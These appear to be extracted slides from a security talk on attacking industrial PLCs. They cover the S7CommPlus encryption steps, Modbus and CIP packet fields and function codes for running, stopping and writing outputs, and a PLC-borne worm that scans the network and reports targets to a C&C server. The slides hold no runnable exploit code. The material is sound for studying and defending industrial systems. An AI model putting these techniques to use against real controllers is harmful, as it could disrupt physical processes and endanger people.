Introduction of PLCs Attacking
Siemens PLC Protocol
Schneider PLC Protocol
Rockwell AB PLC Protocol
Attacking PLCs by PLC
• Replay attacks have been widely used in PLC attacks.
• Get the communication sequence packets with the help of Wireshark
S7-300
• S7-200,S7-300,S7-400 using the S7Comm protocol
S7-1500
S7-1200
• S7-1200v3.0 using the early S7CommPlus protocol
• S7-1200v4.0, S7-1500 using the current encrypted S7CommPlus protocol
• The current S7CommPlus protocol including the S7CommPlus Connection packets and S7CommPlus Function packets has a similar structure.
• 1. First Connection Setup Request• 2. Frist Connection Setup Response• 3. Second Connection Setup Request• 4. Function Packet—Stop PLC
• Using reverse debugging techniques, we found these encryption is calculated by TIA Portal through a file named OMSp_core_managed.dll
1. Connection packet encryption
Input parameter for this encryption is a random value array generated by
the PLC in the first connection response packet.
Using XOR (we call this Encryption1), the first encryption can be calculated with the input
parameter Value Array.
Encryption1 First EncryptionValue Array
(1) First encryption in the connection packet
(2)Second encryption in the connection packet
Using the result of the first encryption as input parameter, the second encryption is
calculated through a more complex Siemens-private algorithm.
Encryption2 Second EncryptionFirst Encryption
2. Function packet encryption
A fixed field array with Session ID is the input parameter. A complex algorithm (we call
this Encryption3) is used to calculated the encryption result as follow:
Encryption3 Function Encryption
ConstanArray
(with Session ID)
ModBus/TCP
Port: 502
Function Code : 90
Unity Pro
1. Get Session ID2. Run PLC Packet3. Stop PLC Packet4. Write DO Value
For DO Value Write Packet, the first byte is the Session ID, the second byte is the function code, 0x50 means write digital value, the 22nd byte is the address and the 29th byte is the value.
EtherNet/IP&CIP
Port: 44818
RSLogix
1. EtherNet/IP Connection Packet
The EtherNet/IP connection is shown above, it has 4 ENIP packets, with the “Command” 0x0001(Unknown),
0x0004(ListServices), 0x0064(ListInterfaces) and 0x0065(Register Session). There is a Session ID in the
response packet of Register Session Request packet, as shown below
2. CIP Connection Packet
When EtherNEt/IP successfully connected, then send a CIP Connection Manager packet, as shown below
After sending the CIP CM request packet, the PLC will send a CIP CM response packet, as shown below
The O->T Network Connection will play the part as Session ID in the following CIP function packet
Following the CIP connection Manager connection is the CIP connection, there
are totally 6 packets in this CIP connection procedure.
Every Connection packet use the O->T Network Connection ID and Originator
Serial Number from CIP Connection Manager Response packet, as shown in
the red box and blue box of the figure below. Every CIP Packet use Sequence
Count as the sequence of the communication, as shown in the green box below.
3. Run PLC packet
The red box is the O->T
Network Connection ID and the
blue box is the Originator Serial
Number both in the CIP
Connection Manager
Response packet. The green
box is the Sequence Count.
The yellow one “0x55, 0x01”is
the run PLC function code.
4. Stop PLC Packet
The red box is the O->T
Network Connection ID
and the blue box is the
Originator Serial Number
both in the CIP Connection
Manager Response packet.
The green box is the
Sequence Count. The
yellow one “0xf1, 0x01”is
the stop PLC function code.
5. Write Digital Value packet
The red box is the O->T
Network Connection ID and the
blue box is the Originator Serial
Number both in the CIP
Connection Manager Response
packet. The green box is the
Sequence Count. The yellow
one is the function code. Purple
one is the address and orange
one is the value.
• TCP, Port 502, Port 44818
– All Schneider PLCs use port 502 for
TCP communication
– All AB PLCs use port 44818 for TCP
communication
• TCON、TDISCON
– TCON:To establish TCP connection
with other device
– TDISCON:Disconnect the
established TCP connections.
• TCP
– Using the Modbus protocol and
the CIP protocol to play replay
attack to the PLCs inside the net
• TSEND, TRCV
– TSEND:Send TCP data
– TRCV:Receive TCP data
• Packets message in DB block
– Leave the detecting and attacking
packets message in DB block.
PLC detection and finally send the PLCs’ information like IP and Port to C&C server.
Attacking Schneider and AB PLCs.
THANK YOU